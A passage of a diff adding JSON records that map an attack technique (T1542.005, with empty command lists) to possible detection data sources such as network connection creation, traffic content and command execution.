endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1542.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + 